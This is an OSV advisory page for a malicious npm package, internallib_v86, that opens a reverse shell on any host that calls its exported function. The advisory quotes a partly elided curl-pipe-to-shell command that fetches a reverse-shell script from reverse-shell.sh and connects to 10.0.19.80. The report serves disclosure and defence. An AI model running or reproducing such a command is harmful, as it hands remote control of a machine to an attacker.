internallib_v86@1.0.2
Vulnerability report · Last retrieved from osv.dev October 6, 2026 at 2:31 PM UTC
OSV ID
MAL-2026-17634
Ecosystem
npm
Summary
internallib_v86 ships a tiny index.js that exports a function command which invokes /bin/bash -c "curl https://reverse-shell.sh/... | sh" targeting 10.0.19.80:443. Any consumer that requires the package and calls the exported function causes the installer's host to fetch a reverse-shell script from reverse-shell.sh and pipe it to a shell, giving an interactive remote shell on the installer to whoever controls 10.0.19.80. The package name is generic and no legitimate functionality is implemented alongside this behavior.
Source: amazon-inspector (9ea0c4f9673e1db33b6782ea815e30df5d2420ceff6d7ab920592e70a511bc07)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.